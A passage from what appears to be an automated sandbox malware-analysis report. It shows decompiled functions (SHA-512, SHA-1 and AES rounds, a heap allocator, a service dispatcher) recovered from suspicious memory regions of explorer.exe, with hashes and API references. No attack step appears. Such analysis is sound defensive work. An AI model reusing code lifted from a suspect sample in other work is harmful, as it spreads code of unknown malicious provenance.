					_v8 = _t224;
				} while ( *_t97 != 0);
				_v8 = _v8 & 0x00000000;
				do {
					_t319 = _v48;
					_t270 = _v44;
					_t272 = _v44;
					_t391 = _v80;
					_t331 = _v8;
					asm("adc ecx, esi");
					_t134 = _t331 + 0x152beb0; // 0xd728ae22
					_t426 = _v76;
					asm("adc ecx, [edx+0x152beb4]"); // 0x428a2f98
					asm("adc ecx, [ebp+edx-0x2e4]");
					asm("adc ecx, [ebp-0x10]");
					_v16 = ((_v44 >> 0x00000009 | _t319 << 0x00000017) ^ (_t270 << 0x00000020 | _v48) >> 0x12 ^ (_t272 << 0x00000020 | _v48) >> 0xe) + ((_v40 ^ _v32) & _v48 ^ _v32) +  *_t134 +  *((intOrPtr*)(_t438 + _v8 - 0x2e8)) + _v24;
					_v12 = (_v44 << 0x00000020 | _t319) << 0x17 ^ (_v48 << 0x0000000e | _t270 >> 0x00000012) ^ (_v48 << 0x00000012 | _t272 >> 0x0000000e);
					_t393 = _v80;
					_v84 = (_t426 << 0x00000020 | _v80) >> 0x1c ^ (_v76 >> 0x00000002 | _t391 << 0x0000001e) ^ (_v76 >> 0x00000007 | _t393 << 0x00000019);
					_v24 = _v32;
					_v20 = _v28;
					_v32 = _v40;
					_v28 = _v36;
					_v40 = _v48;
					_v36 = _v44;
					asm("adc eax, esi");
					asm("adc esi, [ebp-0x8]");
					_v48 = _v56 + _v16;
					asm("adc eax, [ebp-0x8]");
					_v8 = _v8 + 8;
					_v56 = _v64;
					_v52 = _v60;
					_v64 = _v72;
					_v60 = _v68;
					_v72 = _v80;
					_v44 = _v52;
					_v68 = _v76;
					_v80 = _v84 + ((_v72 | _v80) & _v64 | _v72 & _v80) + _v16;
					_v76 = (_v80 << 0x00000004 | _t426 >> 0x0000001c) ^ (_v76 << 0x00000020 | _t391) << 0x1e ^ (_v76 << 0x00000020 | _t393) << 0x19;
				} while (_v8 < 0x280);
				_t248 = _v108;
				_t307 = 0;
				do {
					 *_t248 =  *_t248 +  *((intOrPtr*)(_t438 + _t307 * 8 - 0x4c));
					asm("adc [eax+0x4], edx");
					_t307 = _t307 + 1;
					_t248 = _t248 + 8;
				} while (_t307 < 8);
				return _t248;
			}

0x01512ad6
0x01512ad6
0x01512ae2
0x01512ae2
0x01512ae7
0x01512aea
0x01512aee
0x01512af3
0x01512af5
0x01512af8
0x01512af8
0x01512afc
0x01512afd
0x01512b0c
0x01512b0d
0x01512b1b
0x01512b1c
0x01512b2b
0x01512b2c
0x01512b3b
0x01512b3c
0x01512b4b
0x01512b4c
0x01512b5b
0x01512b5c
0x01512b6b
0x01512b70
0x01512b77
0x01512b7e
0x01512b7f
0x01512b82
0x01512b8b
0x01512b91
0x01512b94
0x01512b9b
0x01512b9e
0x01512ba4
0x01512ba7
0x01512ba9
0x01512bb0
0x01512bbf
0x01512bc2
0x01512be2
0x01512bf8
0x01512c01
0x01512c3b
0x01512c43
0x01512c48
0x01512c4e
0x01512c51
0x01512c54
0x01512c57
0x01512c5a
0x01512c5a
0x01512c5d
0x01512c5d
0x01512c66
0x01512c6a
0x01512c6a
0x01512c7a
0x01512c9f
0x01512ccf
0x01512cdd
0x01512ce0
0x01512ce2
0x01512ce8
0x01512ceb
0x01512cf8
0x01512d05
0x01512d10
0x01512d16
0x01512d30
0x01512d53
0x01512d82
0x01512d88
0x01512d8e
0x01512d94
0x01512d9a
0x01512da0
0x01512da6
0x01512dae
0x01512db4
0x01512dba
0x01512dbd
0x01512dc8
0x01512dce
0x01512dd4
0x01512dda
0x01512de0
0x01512de6
0x01512de9
0x01512dec
0x01512def
0x01512def
0x01512df8
0x01512dfd
0x01512e00
0x01512e04
0x01512e0a
0x01512e0d
0x01512e0e
0x01512e11
0x01512e17

Strings

psAssert %s, xrefs: 01512ADF
@, xrefs: 01512B94

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: @$psAssert %s
API String ID: 0-1524677707
Opcode ID: 1fbcffdca37b4ff5f2b6a15161410dffdfeb12ac269eb112aecc4e0f5194e2d1
Instruction ID: d9c3b0a93f8433420b5d2672a5cabaff8f8b57a995c492b21e0d846e44079863
Opcode Fuzzy Hash: 1fbcffdca37b4ff5f2b6a15161410dffdfeb12ac269eb112aecc4e0f5194e2d1
Instruction Fuzzy Hash: CCC10B76E002289FDB44CF99C8806DDFBF2BF88314F1A8269D959B7355D674A902CB90

Uniqueness

Uniqueness Score: 5.54%

Function 0150F10A, Relevance: 2.5, APIs: 2, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0150F10A(long _a4) {

				return HeapAlloc(GetProcessHeap(), 8, _a4);
			}

0x0150f120

APIs

GetProcessHeap.KERNEL32(00000008,?,?,0150F164,0150EED3,?,?,0150F4DF,?,?,0150EED1,?,0150EED3,?,?,?), ref: 0150F112
HeapAlloc.KERNEL32(00000000,?,0150F164,0150EED3,?,?,0150F4DF,?,?,0150EED1,?,0150EED3,?,?,?,00000000), ref: 0150F119

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 48c4ff78e0f582130f3d8dcd7a8179fb69d2eaca415ce58f0bdbeda204e262a5
Instruction ID: e1859f72ea610c58e4222c060baa3c07882d50834940046c2aa4461fc0e3bb17
Opcode Fuzzy Hash: 48c4ff78e0f582130f3d8dcd7a8179fb69d2eaca415ce58f0bdbeda204e262a5
Instruction Fuzzy Hash: A0B09233040208BFEE202FE5E80EA893F2CEB4A6E1F114000F61D8A845CF769058ABA1

Uniqueness

Uniqueness Score: 0.14%

Function 01520650, Relevance: 1.5, Strings: 1, Instructions: 278
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01520650(void* _a4) {
				signed int _v8;
				unsigned int _v336;
				unsigned int _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				signed int _v360;
				unsigned int _v364;
				signed int _v368;
				signed int _v372;
				intOrPtr _t268;
				void* _t444;

				_v356 = 0x5a827999;
				_v352 = 0x6ed9eba1;
				_v348 = 0x8f1bbcdc;
				_v344 = 0xca62c1d6;
				_v372 = 0;
				while(_v372 < 0x10) {
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1c + _v372 * 4) & 0x000000ff) << 0x18;
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1d + _v372 * 4) & 0x000000ff) << 0x00000010 |  *(_t444 + _v372 * 4 - 0x148);
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1e + _v372 * 4) & 0x000000ff) << 0x00000008 |  *(_t444 + _v372 * 4 - 0x148);
					 *(_t444 + _v372 * 4 - 0x148) =  *(_a4 + 0x1f + _v372 * 4) & 0x000000ff |  *(_t444 + _v372 * 4 - 0x148);
					_v372 = _v372 + 1;
				}
				_v372 = 0x10;
				while(_v372 < 0x50) {
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_t444 + _v372 * 4 - 0x154) ^  *(_t444 + _v372 * 4 - 0x168) ^  *(_t444 + _v372 * 4 - 0x180) ^  *(_t444 + _v372 * 4 - 0x188)) << 0x00000001 | ( *(_t444 + _v372 * 4 - 0x154) ^  *(_t444 + _v372 * 4 - 0x168) ^  *(_t444 + _v372 * 4 - 0x180) ^  *(_t444 + _v372 * 4 - 0x188)) >> 0x0000001f;
					_v372 = _v372 + 1;
				}
				_v364 =  *_a4;
				_v340 =  *((intOrPtr*)(_a4 + 4));
				_v360 =  *((intOrPtr*)(_a4 + 8));
				_v368 =  *((intOrPtr*)(_a4 + 0xc));
				_v8 =  *((intOrPtr*)(_a4 + 0x10));
				_v372 = 0;
				while(_v372 < 0x14) {
					_v336 = (_v340 & _v360 |  !_v340 & _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v356;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x14;
				while(_v372 < 0x28) {
					_v336 = (_v340 ^ _v360 ^ _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v352;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x28;
				while(_v372 < 0x3c) {
					_v336 = (_v340 & _v360 | _v340 & _v368 | _v360 & _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v348;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x3c;
				while(_v372 < 0x50) {
					_v336 = (_v340 ^ _v360 ^ _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v344;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				 *_a4 =  *_a4 + _v364;
				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + _v340;
				 *((intOrPtr*)(_a4 + 8)) =  *((intOrPtr*)(_a4 + 8)) + _v360;
				 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + _v368;
				_t268 =  *((intOrPtr*)(_a4 + 0x10)) + _v8;
				 *((intOrPtr*)(_a4 + 0x10)) = _t268;
				 *((intOrPtr*)(_a4 + 0x5c)) = 0;
				return _t268;
			}

0x01520659
0x01520663
0x0152066d
0x01520677
0x01520681
0x0152069c
0x015206c0
0x015206eb
0x01520716
0x0152073e
0x01520696
0x01520696
0x0152074a
0x01520765
0x015207e7
0x0152075f
0x0152075f
0x015207f8
0x01520804
0x01520810
0x0152081c
0x01520828
0x0152082b
0x01520846
0x0152089b
0x015208b3
0x015208bc
0x015208d6
0x015208e2
0x015208ee
0x01520840
0x01520840
0x015208f9
0x01520914
0x0152095f
0x01520977
0x01520980
0x0152099a
0x015209a6
0x015209b2
0x0152090e
0x0152090e
0x015209bd
0x015209d8
0x01520a39
0x01520a51
0x01520a5a
0x01520a74
0x01520a80
0x01520a8c
0x015209d2
0x015209d2
0x01520a97
0x01520ab2
0x01520afd
0x01520b15
0x01520b1e
0x01520b38
0x01520b44
0x01520b50
0x01520aac
0x01520aac
0x01520b69
0x01520b7a
0x01520b8c
0x01520b9e
0x01520ba7
0x01520bad
0x01520bb3
0x01520bbd

Strings

P, xrefs: 01520AB2

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 17bd87f89b5fd1cc1ec8a10098476c26f34db0aaa0268bd521febf102b2e6fe5
Instruction ID: 4e2bb8388154c6e9d410d24a5b9edcea0003cf5cdc5d79f24fb1d5c9b4250d12
Opcode Fuzzy Hash: 17bd87f89b5fd1cc1ec8a10098476c26f34db0aaa0268bd521febf102b2e6fe5
Instruction Fuzzy Hash: DFF17D74A05228CBDB65CF18CC90AD9B7B1BF89305F5082D9D84DAB345DB31AE92CF80

Uniqueness

Uniqueness Score: 0.74%

Function 003F1420, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E003F1420() {
				int _t4;
				signed int _t9;

				while(0 != 0) {
				}
				__eflags =  *0x40e018;
				if(__eflags == 0) {
					 *0x40e018 = 0x40f694;
					E003F4820(__eflags, 0x40f694, 5, 8, 0x4101bc);
				}
				_t9 =  *0x40ffac; // 0x0
				_t4 = StartServiceCtrlDispatcherA(0x40e018 + _t9 * 8);
				__eflags = _t4;
				if(_t4 != 0) {
					__eflags = 0;
					return 0;
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 0xffffffff;
				}
			}

0x003f1423
0x003f1427
0x003f1429
0x003f1430
0x003f1432
0x003f144a
0x003f144f
0x003f1452
0x003f1460
0x003f1466
0x003f1468
0x003f1475
0x00000000
0x003f146a
0x003f146a
0x003f146a
0x003f146c
0x00000000
0x00000000
0x003f146e
0x00000000
0x003f1470

APIs

StartServiceCtrlDispatcherA.ADVAPI32(?,?,003F3474), ref: 003F1460

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: a7d3e9ca45cbc9190f735f223bc93bc44bc5cab728512912ca3cd3e774277574
Instruction ID: e77538a6b99a09bf79d84e397ad2d5a05fecbb0d7798d025eb1e6dda7ac93d00
Opcode Fuzzy Hash: a7d3e9ca45cbc9190f735f223bc93bc44bc5cab728512912ca3cd3e774277574
Instruction Fuzzy Hash: 11F02B3131430DD5E7318F22BD05732327CA3D1718F10893A9714ED8E0EAFA855896DD

Uniqueness

Uniqueness Score: 0.49%

Function 003FCEA0, Relevance: 1.5, Strings: 1, Instructions: 278
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003FCEA0(void* _a4) {
				signed int _v8;
				unsigned int _v336;
				unsigned int _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				signed int _v360;
				unsigned int _v364;
				signed int _v368;
				signed int _v372;
				intOrPtr _t268;
				void* _t444;

				_v356 = 0x5a827999;
				_v352 = 0x6ed9eba1;
				_v348 = 0x8f1bbcdc;
				_v344 = 0xca62c1d6;
				_v372 = 0;
				while(_v372 < 0x10) {
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1c + _v372 * 4) & 0x000000ff) << 0x18;
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1d + _v372 * 4) & 0x000000ff) << 0x00000010 |  *(_t444 + _v372 * 4 - 0x148);
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1e + _v372 * 4) & 0x000000ff) << 0x00000008 |  *(_t444 + _v372 * 4 - 0x148);
					 *(_t444 + _v372 * 4 - 0x148) =  *(_a4 + 0x1f + _v372 * 4) & 0x000000ff |  *(_t444 + _v372 * 4 - 0x148);
					_v372 = _v372 + 1;
				}
				_v372 = 0x10;
				while(_v372 < 0x50) {
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_t444 + _v372 * 4 - 0x154) ^  *(_t444 + _v372 * 4 - 0x168) ^  *(_t444 + _v372 * 4 - 0x180) ^  *(_t444 + _v372 * 4 - 0x188)) << 0x00000001 | ( *(_t444 + _v372 * 4 - 0x154) ^  *(_t444 + _v372 * 4 - 0x168) ^  *(_t444 + _v372 * 4 - 0x180) ^  *(_t444 + _v372 * 4 - 0x188)) >> 0x0000001f;
					_v372 = _v372 + 1;
				}
				_v364 =  *_a4;
				_v340 =  *((intOrPtr*)(_a4 + 4));
				_v360 =  *((intOrPtr*)(_a4 + 8));
				_v368 =  *((intOrPtr*)(_a4 + 0xc));
				_v8 =  *((intOrPtr*)(_a4 + 0x10));
				_v372 = 0;
				while(_v372 < 0x14) {
					_v336 = (_v340 & _v360 |  !_v340 & _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v356;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x14;
				while(_v372 < 0x28) {
					_v336 = (_v340 ^ _v360 ^ _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v352;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x28;
				while(_v372 < 0x3c) {
					_v336 = (_v340 & _v360 | _v340 & _v368 | _v360 & _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v348;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x3c;
				while(_v372 < 0x50) {
					_v336 = (_v340 ^ _v360 ^ _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v344;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				 *_a4 =  *_a4 + _v364;
				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + _v340;
				 *((intOrPtr*)(_a4 + 8)) =  *((intOrPtr*)(_a4 + 8)) + _v360;
				 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + _v368;
				_t268 =  *((intOrPtr*)(_a4 + 0x10)) + _v8;
				 *((intOrPtr*)(_a4 + 0x10)) = _t268;
				 *((intOrPtr*)(_a4 + 0x5c)) = 0;
				return _t268;
			}

0x003fcea9
0x003fceb3
0x003fcebd
0x003fcec7
0x003fced1
0x003fceec
0x003fcf10
0x003fcf3b
0x003fcf66
0x003fcf8e
0x003fcee6
0x003fcee6
0x003fcf9a
0x003fcfb5
0x003fd037
0x003fcfaf
0x003fcfaf
0x003fd048
0x003fd054
0x003fd060
0x003fd06c
0x003fd078
0x003fd07b
0x003fd096
0x003fd0eb
0x003fd103
0x003fd10c
0x003fd126
0x003fd132
0x003fd13e
0x003fd090
0x003fd090
0x003fd149
0x003fd164
0x003fd1af
0x003fd1c7
0x003fd1d0
0x003fd1ea
0x003fd1f6
0x003fd202
0x003fd15e
0x003fd15e
0x003fd20d
0x003fd228
0x003fd289
0x003fd2a1
0x003fd2aa
0x003fd2c4
0x003fd2d0
0x003fd2dc
0x003fd222
0x003fd222
0x003fd2e7
0x003fd302
0x003fd34d
0x003fd365
0x003fd36e
0x003fd388
0x003fd394
0x003fd3a0
0x003fd2fc
0x003fd2fc
0x003fd3b9
0x003fd3ca
0x003fd3dc
0x003fd3ee
0x003fd3f7
0x003fd3fd
0x003fd403
0x003fd40d

Strings

P, xrefs: 003FD302

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 17bd87f89b5fd1cc1ec8a10098476c26f34db0aaa0268bd521febf102b2e6fe5
Instruction ID: 9efe8bd86f3706fdcd6ad075d3f23bf4cb32f00faf12e026df5baa72f364edb8
Opcode Fuzzy Hash: 17bd87f89b5fd1cc1ec8a10098476c26f34db0aaa0268bd521febf102b2e6fe5
Instruction Fuzzy Hash: BAF18274904228CBDB65CF18DC94AD9B7B2BF89305F5082D9D84DAB354C731AE92CF80

Uniqueness

Uniqueness Score: 0.74%

Function 01511533, Relevance: .4, Instructions: 370
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E01511533(signed char* __eax, char* __ecx, signed int* _a4) {
				unsigned int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed char* _t201;
				unsigned int _t210;
				unsigned int _t219;
				char* _t322;
				signed int* _t323;
				signed int _t377;
				unsigned int _t386;
				unsigned int _t395;
				unsigned int _t404;
				unsigned int _t413;
				unsigned int _t415;
				unsigned int _t459;
				unsigned int _t472;
				signed int* _t499;
				signed int* _t500;

				_t322 = __ecx;
				_t201 = __eax;
				_t323 = _a4;
				if(__eax != 0 && __ecx != 0 && _t323 != 0) {
					_v32 = _t323[0x80];
					_t219 = (((( *__eax & 0x000000ff) << 0x00000008 | __eax[1] & 0x000000ff) << 0x00000008 | __eax[2] & 0x000000ff) << 0x00000008 | __eax[3] & 0x000000ff) ^  *_t323;
					_t459 = ((((__eax[4] & 0x000000ff) << 0x00000008 | __eax[5] & 0x000000ff) << 0x00000008 | __eax[6] & 0x000000ff) << 0x00000008 | __eax[7] & 0x000000ff) ^ _t323[1];
					_v24 = ((((__eax[8] & 0x000000ff) << 0x00000008 | __eax[9] & 0x000000ff) << 0x00000008 | __eax[0xa] & 0x000000ff) << 0x00000008 | __eax[0xb] & 0x000000ff) ^ _a4[2];
					_t499 = _a4;
					_v20 = _t459;
					_v8 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) << 0x00000008 | __eax[0xe] & 0x000000ff) << 0x00000008 | __eax[0xf] & 0x000000ff) ^ _t499[3];
					_t500 =  &(_t499[4]);
					asm("ror edx, 0x10");
					asm("ror edi, 0x8");
					asm("ror edi, 0x18");
					_v28 = _t219;
					_v16 =  *(0x152abb8 + (_v24 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_t459 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v8 & 0x000000ff) * 4) ^  *(0x152abb8 + (_t219 >> 0x18) * 4) ^  *_t500;
					asm("ror edi, 0x10");
					asm("ror edx, 0x8");
					asm("ror edx, 0x18");
					_t472 =  *(0x152abb8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v24 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_t219 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v20 >> 0x18) * 4) ^ _t500[1];
					asm("ror edx, 0x8");
					asm("ror ebx, 0x10");
					asm("ror ebx, 0x18");
					_v12 =  *(0x152abb8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_t219 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v20 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v24 >> 0x18) * 4) ^ _t500[2];
					asm("ror edx, 0x10");
					asm("ror ebx, 0x8");
					asm("ror ebx, 0x18");
					_v8 =  *(0x152abb8 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v28 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v24 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v8 >> 0x18) * 4) ^ _t500[3];
					_t377 = _v32 + 0xfffffffe;
					if(_t377 == 0) {
						L6:
						_t386 =  *(0x152afb8 + (_t472 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152afb8 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152afb8 + (_v16 >> 0x18) * 4) & 0xff000000 ^  *(0x152afb8 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^ _t500[4];
						 *_t322 = _t386 >> 0x18;
						 *((char*)(_t322 + 1)) = _t386 >> 0x10;
						 *(_t322 + 3) = _t386;
						 *((char*)(_t322 + 2)) = _t386 >> 8;
						_t395 =  *(0x152afb8 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152afb8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152afb8 + (_t472 >> 0x18) * 4) & 0xff000000 ^  *(0x152afb8 + (_v16 & 0x000000ff) * 4) & 0x000000ff ^ _t500[5];
						 *((char*)(_t322 + 4)) = _t395 >> 0x18;
						 *((char*)(_t322 + 5)) = _t395 >> 0x10;
						 *((char*)(_t322 + 6)) = _t395 >> 8;
						 *(_t322 + 7) = _t395;
						_t404 =  *(0x152afb8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152afb8 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152afb8 + (_v12 >> 0x18) * 4) & 0xff000000 ^  *(0x152afb8 + (_t472 & 0x000000ff) * 4) & 0x000000ff ^ _t500[6];
						 *((char*)(_t322 + 8)) = _t404 >> 0x18;
						 *(_t322 + 0xb) = _t404;
						 *((char*)(_t322 + 9)) = _t404 >> 0x10;
						 *((char*)(_t322 + 0xa)) = _t404 >> 8;
						_t413 =  *(0x152afb8 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152afb8 + (_t472 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152afb8 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x152afb8 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^ _t500[7];
						 *((char*)(_t322 + 0xc)) = _t413 >> 0x18;
						 *((char*)(_t322 + 0xd)) = _t413 >> 0x10;
						_t210 = _t413 >> 8;
						 *(_t322 + 0xe) = _t210;
						 *(_t322 + 0xf) = _t413;
						return _t210;
					}
					_v32 = _t377;
					do {
						_v28 = _v16;
						_t415 = _v12;
						_v24 = _t415;
						_t500 =  &(_t500[4]);
						asm("ror edx, 0x10");
						asm("ror ebx, 0x8");
						asm("ror ebx, 0x18");
						_v16 =  *(0x152abb8 + (_t415 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_t472 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v8 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v16 >> 0x18) * 4) ^  *_t500;
						asm("ror edx, 0x10");
						asm("ror ebx, 0x8");
						asm("ror ebx, 0x18");
						_v20 = _t472;
						_t472 =  *(0x152abb8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v28 & 0x000000ff) * 4) ^  *(0x152abb8 + (_t472 >> 0x18) * 4) ^ _t500[1];
						asm("ror edx, 0x8");
						asm("ror ebx, 0x10");
						asm("ror ebx, 0x18");
						_v12 =  *(0x152abb8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v28 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v20 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v12 >> 0x18) * 4) ^ _t500[2];
						asm("ror ebx, 0x10");
						asm("ror edx, 0x8");
						asm("ror edx, 0x18");
						_t135 =  &_v32;
						 *_t135 = _v32 - 1;
						_v8 =  *(0x152abb8 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v28 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v24 & 0x000000ff) * 4) ^  *(0x152abb8 + (_v8 >> 0x18) * 4) ^ _t500[3];
					} while ( *_t135 != 0);
					goto L6;
				}
				return _t201;
			}

0x01511533
0x01511533
0x01511536
0x0151153e
0x0151155f
0x01511585
0x0151159f
0x015115cb
0x015115e4
0x015115ef
0x015115f2
0x01511615
0x01511618
0x0151161b
0x0151162c
0x0151163d
0x01511642
0x01511663
0x01511666
0x01511676
0x0151168b
0x015116a6
0x015116a9
0x015116ba
0x015116d5
0x015116f0
0x015116f3
0x01511704
0x01511719
0x0151171f
0x01511722
0x01511865
0x015118b4
0x015118bc
0x015118c3
0x015118c6
0x015118ce
0x01511920
0x01511928
0x01511930
0x01511938
0x0151193e
0x0151198d
0x01511998
0x0151199d
0x015119a5
0x015119b5
0x015119f8
0x01511a01
0x01511a09
0x01511a0e
0x01511a12
0x01511a15
0x00000000
0x01511a18
0x01511728
0x0151172b
0x0151172e
0x01511731
0x01511734
0x01511743
0x01511746
0x01511757
0x01511768
0x01511782
0x01511794
0x015117a0
0x015117b1
0x015117b9
0x015117d5
0x015117e6
0x015117e9
0x015117fa
0x0151180f
0x01511830
0x01511833
0x01511844
0x01511859
0x01511859
0x0151185c
0x0151185c
0x00000000
0x0151172b
0x01511a1a

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f5fa5e39c71b9080f2b18792eb32147f25333f4050310c1cd8537bb074c235
Instruction ID: f46f481e73ac92fe8a8d4505990e57122e6bdd2f7ac5bfdc2f69aed4a0b5e6f9
Opcode Fuzzy Hash: c0f5fa5e39c71b9080f2b18792eb32147f25333f4050310c1cd8537bb074c235
Instruction Fuzzy Hash: 16E1C532A007518FD7A0DFAEDCC050AB7F3ABCE211B5ECAA5C6545B60FC634A916D790

Uniqueness

Uniqueness Score: 0.00%

